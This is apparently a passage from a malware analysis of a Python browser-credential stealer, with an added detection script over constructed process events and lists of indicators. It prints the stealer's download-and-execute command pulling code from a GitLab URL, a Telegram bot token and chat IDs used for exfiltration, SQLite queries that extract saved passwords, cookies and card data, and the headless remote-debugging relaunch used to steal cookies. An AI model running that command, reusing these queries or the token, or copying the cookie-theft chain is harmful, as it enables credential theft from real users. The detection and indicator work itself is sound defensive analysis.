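The command lines above, together with the quote-split `-enc` form in the .bat, give enough to detect the chain on process-creation telemetry alone: a hidden, encoded PowerShell launch; a Python `-c "import requests;exec(requests.get(...))"` downloader running under a non-Python file name (with TLS verification turned off); and a browser killed with taskkill and relaunched seconds later headless with `--remote-debugging-port` and `--remote-allow-origins=*`. The following is an added example, not code from the original write-up, that runs those rules over constructed events. The event schema (`host`, `ts`, `image`, `parent`, `cmdline`) is assumed; map your EDR's field names onto it. The encoded PowerShell in the sample is a harmless stand-in, not the incident's blob.

```python
# Added example (not from the original write-up): detection logic for the
# process chain seen in the EDR log, run over constructed process-creation
# events. The event schema (host, ts, image, parent, cmdline) is assumed here;
# map your EDR's field names onto it. Command lines are modelled on the ones
# listed above; the encoded PowerShell is a constructed stand-in.
import base64
import binascii
import re
from datetime import datetime, timedelta

BROWSERS = ("chrome.exe", "msedge.exe", "brave.exe", "firefox.exe")


def normalize_cmdline(cmd):
    """Windows argv parsing (CommandLineToArgvW rules) drops the quotes in
    by"pa"ss and hi"dd"en, so the process runs with -ep bypass -w hidden.
    Normalise the same way before matching, or the dropper's spelling is missed."""
    return cmd.replace('"', "")


def decode_powershell_enc(cmd):
    """Return the script behind -e/-ec/-enc/-EncodedCommand (base64 of UTF-16LE), or None."""
    m = re.search(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)",
                  normalize_cmdline(cmd), re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def classify(ev):
    """Tag one process-creation event with the behaviours of interest."""
    tags = set()
    raw = ev["cmdline"]
    low = normalize_cmdline(raw).lower()
    image = ev["image"].lower().rsplit("\\", 1)[-1]
    if image in ("powershell.exe", "pwsh.exe"):
        if re.search(r"-w(?:indowstyle)?\s+hidden", low) and decode_powershell_enc(raw):
            tags.add("ps_hidden_encoded")
        if re.search(r'[a-z0-9]"[a-z0-9+/=]+"[a-z0-9]', raw, re.I):
            tags.add("cmd_quote_splitting")   # quotes inside a single token
    if "exec(requests.get(" in low or re.search(r"\s-c\s+import\s", low):
        tags.add("python_inline_downloader")
        if not image.startswith("python"):
            tags.add("renamed_python")          # synaptics.exe is pythonw.exe
    if image == "taskkill.exe" and "/im" in low and any(b in low for b in BROWSERS):
        tags.add("browser_taskkill")
    if image in BROWSERS and "--remote-debugging-port" in low:
        tags.add("browser_remote_debug")
        if "--headless" in low or "--remote-allow-origins=*" in low:
            tags.add("browser_remote_debug_headless")
    return tags


def detect_chain(events, window=timedelta(minutes=2)):
    """Correlate per host: a browser kill followed within `window` by a
    remote-debugging relaunch is the cookie-theft pattern; the other rules
    fire on a single event."""
    alerts, last_kill = [], {}
    for ev in sorted(events, key=lambda e: e["ts"]):
        tags, host = classify(ev), ev["host"]
        if "browser_taskkill" in tags:
            last_kill[host] = ev["ts"]
        if "ps_hidden_encoded" in tags:
            alerts.append({"rule": "powershell_hidden_encoded", "host": host, "ts": ev["ts"],
                           "quote_split": "cmd_quote_splitting" in tags,
                           "decoded": decode_powershell_enc(ev["cmdline"])})
        if "python_inline_downloader" in tags:
            alerts.append({"rule": "python_inline_downloader", "host": host, "ts": ev["ts"],
                           "image": ev["image"], "renamed": "renamed_python" in tags})
        if "browser_remote_debug" in tags:
            killed = last_kill.get(host)
            chained = killed is not None and ev["ts"] - killed <= window
            alerts.append({"rule": "browser_kill_then_remote_debug" if chained else "browser_remote_debug",
                           "host": host, "ts": ev["ts"], "parent": ev["parent"]})
    return alerts


# Constructed sample events. The -enc blob encodes a harmless stand-in script.
ENC = base64.b64encode("Hide-ConsoleWindow".encode("utf-16-le")).decode()
T = datetime(2024, 12, 20, 10, 0, 0)
SAMPLE_EVENTS = [
    {"host": "PC-EXAMPLE", "ts": T, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": "cmd.exe", "cmdline": f'powershell -ep by"pa"ss -w hi"dd"en -enc {ENC[:12]}"{ENC[12:24]}"{ENC[24:]}'},
    {"host": "PC-EXAMPLE", "ts": T + timedelta(seconds=3), "image": r"C:\Users\Public\ChromeApplication\synaptics.exe",
     "parent": "explorer.exe",
     "cmdline": r'''"C:\Users\Public\ChromeApplication\synaptics.exe" -c "import requests;exec(requests.get('https://gitlab.com/blackhat_code/software/-/raw/main/sup02.entrypoint', verify=False).text)"'''},
    {"host": "PC-EXAMPLE", "ts": T + timedelta(seconds=60), "image": r"C:\Windows\System32\taskkill.exe",
     "parent": "synaptics.exe", "cmdline": "taskkill /F /IM chrome.exe"},
    {"host": "PC-EXAMPLE", "ts": T + timedelta(seconds=61), "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "parent": "synaptics.exe",
     "cmdline": r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --restore-lastest-session --user-data-dir="C:\Users\admin\AppData\Local\Google\Chrome\User Data" --profile-directory=Default --remote-allow-origins=* --headless --window-size=1,1 --disable-gpu --no-sandbox'},
    {"host": "PC-EXAMPLE", "ts": T + timedelta(minutes=5), "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "parent": "explorer.exe", "cmdline": r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory=Default'},
]

if __name__ == "__main__":
    for a in detect_chain(SAMPLE_EVENTS):
        print(a["ts"].time(), a["rule"], a)
```

A plain `--remote-debugging-port` launch is kept as a low-confidence alert because developers use it; the kill-then-relaunch pairing under a non-browser parent is what separates this stealer from legitimate use, and `renamed_python` is worth a rule of its own since the interpreter's own hash is clean.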
### Files accessed
1. All_Passwords.txt
2. login_db
3. cards_db
4. Temp\[TW_<IP>] <ComputerName>.zip
5. Facebook_Cookies.txt
6. profiles.ini (Firefox)
7. logins.json (Firefox)
8. key4.db (Firefox)
9. cookies.sqlite (Firefox)
10. Startup\WindowsSecurity.lnk
- `"C:\Users\Public\ChromeApplication\synaptics.exe" -c "import requests;exec(requests.get('https://gitlab.com/blackhat_code/software/-/raw/main/sup02.entrypoint', verify=False).text)"`
11. C:\Users\Public\ChromeApplication
- DLLs\
- Lib\
- definitions.py
- python310.dll
- synaptics.exe (pythonw.exe 3.10.11)
- vcruntime140.dll
### Connection IPs and URLs
1. `http://localhost:9222/json` (DevTools discovery endpoint of the browser started with remote debugging)
2. `https://api.telegram.org/bot{TOKEN_BOT}/sendDocument`
- 149.154.167.220:443
3. `http://ip-api.com/json/?fields=8195`
- 208.95.112.1:80
4. `.facebook.com`
- adsmanager
- graph
- mbasic
- business
5. `https://gitlab.com/blackhat_code/software/-/raw/main/sup02.entrypoint`
- 172.65.251.78:443
### TG info
1. TOKEN_BOT='7688244721:AAEuVdGvEt2uIYmzQjJmSJX1JKFud9pr1XI'
2. CHAT_ID_NEW='-1002426006531'
3. CHAT_ID_RESET='-1002489276039'
4. https://t[.]me/Xmeta
### SQLite queries used
1. `SELECT item1, item2 FROM metadata;` (Firefox key4.db)
2. `SELECT a11, a102 FROM nssPrivate WHERE a102 = b'\xf8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01';` (Firefox key4.db)
3. `SELECT action_url, username_value, password_value FROM logins` (Chrome/Edge Login Data)
4. `SELECT host, path, name, value, isSecure, isHttpOnly, expiry FROM moz_cookies` (Firefox cookies.sqlite)
5. `SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted, date_modified FROM credit_cards` (Chrome/Edge Web Data)
### Headers
`headers = {'authority': 'adsmanager.facebook.com','accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7','accept-language': 'vi-VN,vi;q=0.9,fr-FR;q=0.8,fr;q=0.7,en-US;q=0.6,en;q=0.5','cache-control': 'max-age=0','sec-ch-prefers-color-scheme': 'dark','sec-ch-ua': '"Chromium";v="112", "Google Chrome";v="112", "Not:A-Brand";v="99"','sec-ch-ua-full-version-list': '"Chromium";v="112.0.5615.140", "Google Chrome";v="112.0.5615.140", "Not:A-Brand";v="99.0.0.0"','sec-ch-ua-mobile': '?0','sec-ch-ua-platform': '"Windows"','sec-ch-ua-platform-version': '"15.0.0"','sec-fetch-dest': 'document','sec-fetch-mode': 'navigate','sec-fetch-site': 'same-origin','sec-fetch-user': '?1','upgrade-insecure-requests': '1','user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36','viewport-width': '794'}`
The hard-coded `accept-language: vi-VN,vi;q=0.9,...` is one more pointer to a Vietnamese operator, and the fixed Chrome 112 user agent is a usable network signature for the Facebook cookie checks.